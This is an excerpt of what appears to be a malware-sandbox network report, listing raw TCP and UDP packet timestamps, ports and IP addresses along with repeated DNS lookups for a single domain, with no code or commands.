                  Oct 10, 2022 23:21:43.878906965 CEST8049727123.213.233.194192.168.2.5
                  Oct 10, 2022 23:21:44.790632963 CEST8049727123.213.233.194192.168.2.5
                  Oct 10, 2022 23:21:44.790733099 CEST8049727123.213.233.194192.168.2.5
                  Oct 10, 2022 23:21:44.790971041 CEST4972780192.168.2.5123.213.233.194
                  Oct 10, 2022 23:21:44.790971041 CEST4972780192.168.2.5123.213.233.194
                  Oct 10, 2022 23:21:44.829437971 CEST4972880192.168.2.5123.213.233.194
                  Oct 10, 2022 23:21:45.059140921 CEST8049727123.213.233.194192.168.2.5
                  Oct 10, 2022 23:21:45.101908922 CEST8049728123.213.233.194192.168.2.5
                  Oct 10, 2022 23:21:45.102057934 CEST4972880192.168.2.5123.213.233.194
                  Oct 10, 2022 23:21:45.102165937 CEST4972880192.168.2.5123.213.233.194
                  Oct 10, 2022 23:21:45.105804920 CEST4972880192.168.2.5123.213.233.194
                  Oct 10, 2022 23:21:45.378236055 CEST8049728123.213.233.194192.168.2.5
                  Oct 10, 2022 23:21:46.274468899 CEST8049728123.213.233.194192.168.2.5
                  Oct 10, 2022 23:21:46.274517059 CEST8049728123.213.233.194192.168.2.5
                  Oct 10, 2022 23:21:46.274831057 CEST4972880192.168.2.5123.213.233.194
                  Oct 10, 2022 23:21:46.274930000 CEST4972880192.168.2.5123.213.233.194
                  Oct 10, 2022 23:21:46.308912039 CEST4972980192.168.2.5175.120.254.9
                  Oct 10, 2022 23:21:46.547418118 CEST8049728123.213.233.194192.168.2.5
                  Oct 10, 2022 23:21:46.581245899 CEST8049729175.120.254.9192.168.2.5
                  Oct 10, 2022 23:21:46.586126089 CEST4972980192.168.2.5175.120.254.9
                  Oct 10, 2022 23:21:46.586225986 CEST4972980192.168.2.5175.120.254.9
                  Oct 10, 2022 23:21:46.586250067 CEST4972980192.168.2.5175.120.254.9
                  Oct 10, 2022 23:21:46.859038115 CEST8049729175.120.254.9192.168.2.5
                  Oct 10, 2022 23:21:47.767224073 CEST8049729175.120.254.9192.168.2.5
                  Oct 10, 2022 23:21:47.767267942 CEST8049729175.120.254.9192.168.2.5
                  Oct 10, 2022 23:21:47.767395020 CEST4972980192.168.2.5175.120.254.9
                  Oct 10, 2022 23:21:47.767431974 CEST4972980192.168.2.5175.120.254.9
                  Oct 10, 2022 23:21:47.845851898 CEST49730443192.168.2.55.135.247.111
                  Oct 10, 2022 23:21:47.845927954 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:47.846951962 CEST49730443192.168.2.55.135.247.111
                  Oct 10, 2022 23:21:47.847460985 CEST49730443192.168.2.55.135.247.111
                  Oct 10, 2022 23:21:47.847498894 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:47.915164948 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:47.915298939 CEST49730443192.168.2.55.135.247.111
                  Oct 10, 2022 23:21:47.918126106 CEST49730443192.168.2.55.135.247.111
                  Oct 10, 2022 23:21:47.918144941 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:47.918535948 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:47.920618057 CEST49730443192.168.2.55.135.247.111
                  Oct 10, 2022 23:21:47.920639038 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:47.985654116 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:47.985713005 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:47.988322973 CEST49730443192.168.2.55.135.247.111
                  Oct 10, 2022 23:21:47.988372087 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:48.013598919 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:48.013863087 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:48.017910957 CEST49730443192.168.2.55.135.247.111
                  Oct 10, 2022 23:21:48.017961979 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:48.018425941 CEST49730443192.168.2.55.135.247.111
                  Oct 10, 2022 23:21:48.039103031 CEST8049729175.120.254.9192.168.2.5
                  Oct 10, 2022 23:21:48.041625977 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:48.041908979 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:48.042117119 CEST49730443192.168.2.55.135.247.111
                  Oct 10, 2022 23:21:48.042164087 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:48.042193890 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:48.042320013 CEST49730443192.168.2.55.135.247.111
                  Oct 10, 2022 23:21:48.042341948 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:48.042469978 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:48.042561054 CEST49730443192.168.2.55.135.247.111
                  Oct 10, 2022 23:21:48.042586088 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:48.042622089 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:48.042757988 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:48.042759895 CEST49730443192.168.2.55.135.247.111
                  Oct 10, 2022 23:21:48.042789936 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:48.043004036 CEST49730443192.168.2.55.135.247.111
                  Oct 10, 2022 23:21:48.043029070 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:48.069622993 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:48.069782019 CEST49730443192.168.2.55.135.247.111
                  Oct 10, 2022 23:21:48.069811106 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:48.069899082 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:48.070144892 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:48.070436954 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:48.070502996 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:48.070660114 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:48.070862055 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:48.071037054 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:48.071252108 CEST49730443192.168.2.55.135.247.111
                  Oct 10, 2022 23:21:48.071270943 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:48.071377039 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:48.071420908 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:48.071506977 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:48.071712971 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:48.072235107 CEST49730443192.168.2.55.135.247.111
                  Oct 10, 2022 23:21:48.072253942 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:48.072978973 CEST49730443192.168.2.55.135.247.111
                  Oct 10, 2022 23:21:48.075459003 CEST49730443192.168.2.55.135.247.111
                  Oct 10, 2022 23:21:48.075470924 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:48.075628042 CEST49730443192.168.2.55.135.247.111
                  Oct 10, 2022 23:21:48.075900078 CEST49730443192.168.2.55.135.247.111
                  Oct 10, 2022 23:21:48.097675085 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:48.097925901 CEST49730443192.168.2.55.135.247.111
                  Oct 10, 2022 23:21:48.098009109 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:48.098202944 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:48.098335028 CEST49730443192.168.2.55.135.247.111
                  Oct 10, 2022 23:21:48.098361015 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:48.098501921 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:48.098570108 CEST49730443192.168.2.55.135.247.111
                  Oct 10, 2022 23:21:48.098594904 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:48.098783016 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:48.098839998 CEST49730443192.168.2.55.135.247.111
                  Oct 10, 2022 23:21:48.098865032 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:48.099020958 CEST49730443192.168.2.55.135.247.111
                  Oct 10, 2022 23:21:48.099047899 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:48.099080086 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:48.099164009 CEST49730443192.168.2.55.135.247.111
                  Oct 10, 2022 23:21:48.099246025 CEST49730443192.168.2.55.135.247.111
                  Oct 10, 2022 23:21:48.099261045 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:48.099319935 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:48.099395990 CEST49730443192.168.2.55.135.247.111
                  Oct 10, 2022 23:21:48.099416018 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:48.099633932 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:48.099711895 CEST49730443192.168.2.55.135.247.111
                  Oct 10, 2022 23:21:48.099731922 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:48.099910021 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:48.100054026 CEST49730443192.168.2.55.135.247.111
                  Oct 10, 2022 23:21:48.100073099 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:48.100147963 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:48.100305080 CEST49730443192.168.2.55.135.247.111
                  Oct 10, 2022 23:21:48.100327015 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:48.100351095 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:48.100445032 CEST49730443192.168.2.55.135.247.111
                  Oct 10, 2022 23:21:48.100461006 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:48.100591898 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:48.100661039 CEST49730443192.168.2.55.135.247.111
                  Oct 10, 2022 23:21:48.100677967 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:48.100764990 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:48.100878000 CEST49730443192.168.2.55.135.247.111
                  Oct 10, 2022 23:21:48.100898027 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:48.100925922 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:48.101094961 CEST49730443192.168.2.55.135.247.111
                  Oct 10, 2022 23:21:48.101111889 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:48.101134062 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:48.101311922 CEST49730443192.168.2.55.135.247.111
                  Oct 10, 2022 23:21:48.101329088 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:48.101350069 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:48.101434946 CEST49730443192.168.2.55.135.247.111
                  Oct 10, 2022 23:21:48.101449966 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:48.101552963 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:48.101650953 CEST49730443192.168.2.55.135.247.111
                  Oct 10, 2022 23:21:48.101670980 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:48.101768970 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:48.101866007 CEST49730443192.168.2.55.135.247.111
                  Oct 10, 2022 23:21:48.101883888 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:48.101963997 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:48.102080107 CEST49730443192.168.2.55.135.247.111
                  Oct 10, 2022 23:21:48.102097034 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:48.102171898 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:48.102293015 CEST49730443192.168.2.55.135.247.111
                  Oct 10, 2022 23:21:48.102310896 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:48.102339983 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:48.102417946 CEST49730443192.168.2.55.135.247.111
                  Oct 10, 2022 23:21:48.102435112 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:48.102509022 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:48.102629900 CEST49730443192.168.2.55.135.247.111
                  Oct 10, 2022 23:21:48.102647066 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:48.102725983 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:48.102844000 CEST49730443192.168.2.55.135.247.111
                  Oct 10, 2022 23:21:48.102863073 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:48.125593901 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:48.125710964 CEST49730443192.168.2.55.135.247.111
                  Oct 10, 2022 23:21:48.125739098 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:48.125823975 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:48.126009941 CEST49730443192.168.2.55.135.247.111
                  Oct 10, 2022 23:21:48.126033068 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:48.126821995 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:48.126913071 CEST49730443192.168.2.55.135.247.111
                  Oct 10, 2022 23:21:48.126935959 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:48.127084970 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:48.127172947 CEST49730443192.168.2.55.135.247.111
                  Oct 10, 2022 23:21:48.127192020 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:48.127285957 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:48.127348900 CEST49730443192.168.2.55.135.247.111
                  Oct 10, 2022 23:21:48.127365112 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:48.127445936 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:48.127502918 CEST49730443192.168.2.55.135.247.111
                  Oct 10, 2022 23:21:48.127518892 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:48.127585888 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:48.127650023 CEST49730443192.168.2.55.135.247.111
                  Oct 10, 2022 23:21:48.127661943 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:48.127809048 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:48.127861977 CEST49730443192.168.2.55.135.247.111
                  Oct 10, 2022 23:21:48.127876043 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:48.128019094 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:48.128072977 CEST49730443192.168.2.55.135.247.111
                  Oct 10, 2022 23:21:48.128086090 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:48.128225088 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:48.128304005 CEST49730443192.168.2.55.135.247.111
                  Oct 10, 2022 23:21:48.128318071 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:48.128395081 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:48.128454924 CEST49730443192.168.2.55.135.247.111
                  Oct 10, 2022 23:21:48.128470898 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:48.128587008 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:48.128644943 CEST49730443192.168.2.55.135.247.111
                  Oct 10, 2022 23:21:48.128657103 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:48.128762007 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:48.128815889 CEST49730443192.168.2.55.135.247.111
                  Oct 10, 2022 23:21:48.128828049 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:48.128927946 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:48.128982067 CEST49730443192.168.2.55.135.247.111
                  Oct 10, 2022 23:21:48.128995895 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:48.129077911 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:48.129132986 CEST49730443192.168.2.55.135.247.111
                  Oct 10, 2022 23:21:48.129147053 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:48.129268885 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:48.129323959 CEST49730443192.168.2.55.135.247.111
                  Oct 10, 2022 23:21:48.129344940 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:48.129492998 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:48.129551888 CEST49730443192.168.2.55.135.247.111
                  Oct 10, 2022 23:21:48.129568100 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:48.129673004 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:48.129728079 CEST49730443192.168.2.55.135.247.111
                  Oct 10, 2022 23:21:48.129743099 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:48.129868031 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:48.129923105 CEST49730443192.168.2.55.135.247.111
                  Oct 10, 2022 23:21:48.129935026 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:48.130085945 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:48.130156040 CEST49730443192.168.2.55.135.247.111
                  Oct 10, 2022 23:21:48.130168915 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:48.130306005 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:48.130409956 CEST49730443192.168.2.55.135.247.111
                  Oct 10, 2022 23:21:48.130429029 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:48.130466938 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:48.130527973 CEST49730443192.168.2.55.135.247.111
                  Oct 10, 2022 23:21:48.130544901 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:48.130629063 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:48.130685091 CEST49730443192.168.2.55.135.247.111
                  Oct 10, 2022 23:21:48.130702972 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:48.130867004 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:48.130923986 CEST49730443192.168.2.55.135.247.111
                  Oct 10, 2022 23:21:48.130939007 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:48.131083965 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:48.131140947 CEST49730443192.168.2.55.135.247.111
                  Oct 10, 2022 23:21:48.131155014 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:48.131311893 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:48.131367922 CEST49730443192.168.2.55.135.247.111
                  Oct 10, 2022 23:21:48.131386995 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:48.131532907 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:48.131594896 CEST49730443192.168.2.55.135.247.111
                  Oct 10, 2022 23:21:48.131607056 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:48.131717920 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:48.131783009 CEST49730443192.168.2.55.135.247.111
                  Oct 10, 2022 23:21:48.131794930 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:48.131901979 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:48.131959915 CEST49730443192.168.2.55.135.247.111
                  Oct 10, 2022 23:21:48.131972075 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:48.132061005 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:48.132128000 CEST49730443192.168.2.55.135.247.111
                  Oct 10, 2022 23:21:48.132142067 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:48.132222891 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:48.132287025 CEST49730443192.168.2.55.135.247.111
                  Oct 10, 2022 23:21:48.132298946 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:48.132417917 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:48.132493019 CEST49730443192.168.2.55.135.247.111
                  Oct 10, 2022 23:21:48.132504940 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:48.132544994 CEST49730443192.168.2.55.135.247.111
                  Oct 10, 2022 23:21:48.132558107 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:48.132623911 CEST49730443192.168.2.55.135.247.111
                  Oct 10, 2022 23:21:48.136281013 CEST49730443192.168.2.55.135.247.111
                  Oct 10, 2022 23:21:48.136303902 CEST443497305.135.247.111192.168.2.5
                  Oct 10, 2022 23:21:49.436579943 CEST4973180192.168.2.5185.95.186.58
                  Oct 10, 2022 23:21:49.525856972 CEST8049731185.95.186.58192.168.2.5
                  Oct 10, 2022 23:21:49.526045084 CEST4973180192.168.2.5185.95.186.58
                  Oct 10, 2022 23:21:49.526122093 CEST4973180192.168.2.5185.95.186.58
                  Oct 10, 2022 23:21:49.528737068 CEST4973180192.168.2.5185.95.186.58
                  Oct 10, 2022 23:21:49.619385958 CEST8049731185.95.186.58192.168.2.5
                  Oct 10, 2022 23:21:49.898238897 CEST8049731185.95.186.58192.168.2.5
                  Oct 10, 2022 23:21:49.898294926 CEST8049731185.95.186.58192.168.2.5
                  Oct 10, 2022 23:21:49.898397923 CEST4973180192.168.2.5185.95.186.58
                  Oct 10, 2022 23:21:49.898523092 CEST4973180192.168.2.5185.95.186.58
                  Oct 10, 2022 23:21:49.989171982 CEST8049731185.95.186.58192.168.2.5

                  UDP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  Oct 10, 2022 23:20:40.206283092 CEST5689453192.168.2.58.8.8.8
                  Oct 10, 2022 23:20:40.449064016 CEST53568948.8.8.8192.168.2.5
                  Oct 10, 2022 23:20:41.917090893 CEST5029553192.168.2.58.8.8.8
                  Oct 10, 2022 23:20:42.280230999 CEST53502958.8.8.8192.168.2.5
                  Oct 10, 2022 23:20:43.738267899 CEST6084153192.168.2.58.8.8.8
                  Oct 10, 2022 23:20:43.880338907 CEST53608418.8.8.8192.168.2.5
                  Oct 10, 2022 23:20:44.554661989 CEST6189353192.168.2.58.8.8.8
                  Oct 10, 2022 23:20:44.574304104 CEST53618938.8.8.8192.168.2.5
                  Oct 10, 2022 23:20:45.734989882 CEST6064953192.168.2.58.8.8.8
                  Oct 10, 2022 23:20:45.752782106 CEST53606498.8.8.8192.168.2.5
                  Oct 10, 2022 23:20:46.418266058 CEST5144153192.168.2.58.8.8.8
                  Oct 10, 2022 23:20:46.663036108 CEST53514418.8.8.8192.168.2.5
                  Oct 10, 2022 23:20:47.929007053 CEST4917753192.168.2.58.8.8.8
                  Oct 10, 2022 23:20:47.948771954 CEST53491778.8.8.8192.168.2.5
                  Oct 10, 2022 23:20:49.240762949 CEST4972453192.168.2.58.8.8.8
                  Oct 10, 2022 23:20:49.260253906 CEST53497248.8.8.8192.168.2.5
                  Oct 10, 2022 23:20:50.731925011 CEST6145253192.168.2.58.8.8.8
                  Oct 10, 2022 23:20:50.751605988 CEST53614528.8.8.8192.168.2.5
                  Oct 10, 2022 23:21:13.010096073 CEST6532353192.168.2.58.8.8.8
                  Oct 10, 2022 23:21:13.245279074 CEST53653238.8.8.8192.168.2.5
                  Oct 10, 2022 23:21:13.717505932 CEST5148453192.168.2.58.8.8.8
                  Oct 10, 2022 23:21:13.857969999 CEST53514848.8.8.8192.168.2.5
                  Oct 10, 2022 23:21:15.730608940 CEST6344653192.168.2.58.8.8.8
                  Oct 10, 2022 23:21:15.750191927 CEST53634468.8.8.8192.168.2.5
                  Oct 10, 2022 23:21:17.362374067 CEST5675153192.168.2.58.8.8.8
                  Oct 10, 2022 23:21:17.379950047 CEST53567518.8.8.8192.168.2.5
                  Oct 10, 2022 23:21:18.839795113 CEST5503953192.168.2.58.8.8.8
                  Oct 10, 2022 23:21:18.858844995 CEST53550398.8.8.8192.168.2.5
                  Oct 10, 2022 23:21:20.335756063 CEST6097553192.168.2.58.8.8.8
                  Oct 10, 2022 23:21:20.353420973 CEST53609758.8.8.8192.168.2.5
                  Oct 10, 2022 23:21:21.809776068 CEST5922053192.168.2.58.8.8.8
                  Oct 10, 2022 23:21:21.829123974 CEST53592208.8.8.8192.168.2.5
                  Oct 10, 2022 23:21:22.548635006 CEST5506853192.168.2.58.8.8.8
                  Oct 10, 2022 23:21:22.566296101 CEST53550688.8.8.8192.168.2.5
                  Oct 10, 2022 23:21:24.031219006 CEST5668253192.168.2.58.8.8.8
                  Oct 10, 2022 23:21:24.050858021 CEST53566828.8.8.8192.168.2.5
                  Oct 10, 2022 23:21:25.518568039 CEST5853253192.168.2.58.8.8.8
                  Oct 10, 2022 23:21:25.894352913 CEST53585328.8.8.8192.168.2.5
                  Oct 10, 2022 23:21:27.173978090 CEST6265953192.168.2.58.8.8.8
                  Oct 10, 2022 23:21:27.193085909 CEST53626598.8.8.8192.168.2.5
                  Oct 10, 2022 23:21:28.682234049 CEST5858153192.168.2.58.8.8.8
                  Oct 10, 2022 23:21:28.701738119 CEST53585818.8.8.8192.168.2.5
                  Oct 10, 2022 23:21:30.186613083 CEST5626353192.168.2.58.8.8.8
                  Oct 10, 2022 23:21:30.204687119 CEST53562638.8.8.8192.168.2.5
                  Oct 10, 2022 23:21:31.682382107 CEST6551353192.168.2.58.8.8.8
                  Oct 10, 2022 23:21:31.699969053 CEST53655138.8.8.8192.168.2.5
                  Oct 10, 2022 23:21:33.160562992 CEST5668753192.168.2.58.8.8.8
                  Oct 10, 2022 23:21:33.180548906 CEST53566878.8.8.8192.168.2.5
                  Oct 10, 2022 23:21:35.344244957 CEST6441953192.168.2.58.8.8.8
                  Oct 10, 2022 23:21:35.696285963 CEST53644198.8.8.8192.168.2.5
                  Oct 10, 2022 23:21:36.014451981 CEST5268853192.168.2.58.8.8.8
                  Oct 10, 2022 23:21:36.031259060 CEST53526888.8.8.8192.168.2.5
                  Oct 10, 2022 23:21:37.208271027 CEST6134453192.168.2.58.8.8.8
                  Oct 10, 2022 23:21:37.227680922 CEST53613448.8.8.8192.168.2.5
                  Oct 10, 2022 23:21:38.681834936 CEST5397253192.168.2.58.8.8.8
                  Oct 10, 2022 23:21:38.701395035 CEST53539728.8.8.8192.168.2.5
                  Oct 10, 2022 23:21:39.953564882 CEST6493253192.168.2.58.8.8.8
                  Oct 10, 2022 23:21:39.973217964 CEST53649328.8.8.8192.168.2.5
                  Oct 10, 2022 23:21:40.651073933 CEST5847253192.168.2.58.8.8.8
                  Oct 10, 2022 23:21:40.670871019 CEST53584728.8.8.8192.168.2.5
                  Oct 10, 2022 23:21:41.838558912 CEST6017753192.168.2.58.8.8.8
                  Oct 10, 2022 23:21:41.856715918 CEST53601778.8.8.8192.168.2.5
                  Oct 10, 2022 23:21:43.310672998 CEST6028453192.168.2.58.8.8.8
                  Oct 10, 2022 23:21:43.330332041 CEST53602848.8.8.8192.168.2.5
                  Oct 10, 2022 23:21:44.809214115 CEST6001953192.168.2.58.8.8.8
                  Oct 10, 2022 23:21:44.828808069 CEST53600198.8.8.8192.168.2.5
                  Oct 10, 2022 23:21:46.289473057 CEST5090253192.168.2.58.8.8.8
                  Oct 10, 2022 23:21:46.307706118 CEST53509028.8.8.8192.168.2.5
                  Oct 10, 2022 23:21:47.778389931 CEST5382353192.168.2.58.8.8.8
                  Oct 10, 2022 23:21:47.844890118 CEST53538238.8.8.8192.168.2.5
                  Oct 10, 2022 23:21:49.415697098 CEST4976953192.168.2.58.8.8.8
                  Oct 10, 2022 23:21:49.435163975 CEST53497698.8.8.8192.168.2.5
                  Oct 10, 2022 23:21:49.902825117 CEST4957953192.168.2.58.8.8.8
                  Oct 10, 2022 23:21:49.922137022 CEST53495798.8.8.8192.168.2.5

                  DNS Queries

                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                  Oct 10, 2022 23:20:40.206283092 CEST192.168.2.58.8.8.80x32c6Standard query (0)gayworld.atA (IP address)IN (0x0001)false
                  Oct 10, 2022 23:20:41.917090893 CEST192.168.2.58.8.8.80x3a9fStandard query (0)gayworld.atA (IP address)IN (0x0001)false
                  Oct 10, 2022 23:20:43.738267899 CEST192.168.2.58.8.8.80xed3aStandard query (0)gayworld.atA (IP address)IN (0x0001)false
                  Oct 10, 2022 23:20:44.554661989 CEST192.168.2.58.8.8.80x4b84Standard query (0)gayworld.atA (IP address)IN (0x0001)false
                  Oct 10, 2022 23:20:45.734989882 CEST192.168.2.58.8.8.80x78b4Standard query (0)gayworld.atA (IP address)IN (0x0001)false
                  Oct 10, 2022 23:20:46.418266058 CEST192.168.2.58.8.8.80xc48dStandard query (0)gayworld.atA (IP address)IN (0x0001)false
